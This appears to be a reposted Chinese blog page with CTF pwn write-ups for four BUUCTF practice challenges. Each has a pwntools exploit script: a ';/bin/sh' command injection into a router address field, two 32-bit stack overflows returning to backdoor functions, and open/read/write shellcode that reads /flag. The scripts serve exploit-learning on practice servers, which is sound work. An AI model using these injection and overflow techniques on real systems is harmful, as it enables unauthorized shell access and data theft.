PWN-PRACTICE-BUUCTF-11
生活随笔
收集整理的這篇文章主要介紹了
PWN-PRACTICE-BUUCTF-11
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
PWN-PRACTICE-BUUCTF-11
- bjdctf_2020_router
- picoctf_2018_buffer overflow 1
- pwnable_orw
- wustctf2020_getshell
bjdctf_2020_router
Linux 系統可以在一個命令行上執行多個命令:; --如果命令被分號(;)所分隔,那么命令會連續的執行下去,就算是錯誤的命令也會繼續執行后面的命令&& --如果命令被 && 所分隔,那么命令也會一直執行下去,但是中間有錯誤的命令就不會執行后面的命令,沒錯就繼續執行直至命令執行完為止|| --如果命令被雙豎線 || 所分隔,那么一遇到可以執行成功的命令就會停止執行后面的命令,而不管后面的命令是否正確。如果執行到錯誤的命令就是繼續執行后一個命令,直到遇到執行到正確的命令或命令執行完為止 from pwn import * #io=process('./bjdctf_2020_router') io=remote('node4.buuoj.cn',28754) io.recvuntil('choose:\n') io.sendline('1') io.recvuntil('address:\n') io.sendline(';/bin/sh') io.interactive()picoctf_2018_buffer overflow 1
32位elf的棧溢出,ret2text
from pwn import * #io=process('./PicoCTF_2018_buffer_overflow_1') io=remote('node4.buuoj.cn',25028) io.recvuntil('string: \n') payload='a'*(0x28+4)+p32(0x080485CB) io.sendline(payload) io.interactive()pwnable_orw
參考:BUUCTF:pwnable_orw
#coding:utf-8 from pwn import * context.arch = 'i386' io=remote('node4.buuoj.cn',29951) #io=process('./pwnable_orw') shellcode = shellcraft.open('/flag') #打開文件后,文件描述符賦給eax shellcode += shellcraft.read('eax','esp',100) shellcode += shellcraft.write(1,'esp',100) payload = asm(shellcode) io.send(payload) io.interactive()wustctf2020_getshell
32位elf的棧溢出,溢出8字節足以,返回到backdoor
from pwn import * #io=process('./wustctf2020_getshell') io=remote('node4.buuoj.cn',27941) payload='a'*(0x18+4)+p32(0x0804851B) io.sendline(payload) io.interactive()總結
以上是生活随笔為你收集整理的PWN-PRACTICE-BUUCTF-11的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 【JS 逆向百例】网洛者反爬练习平台第三
- 下一篇: PWN-COMPETITION-HGAM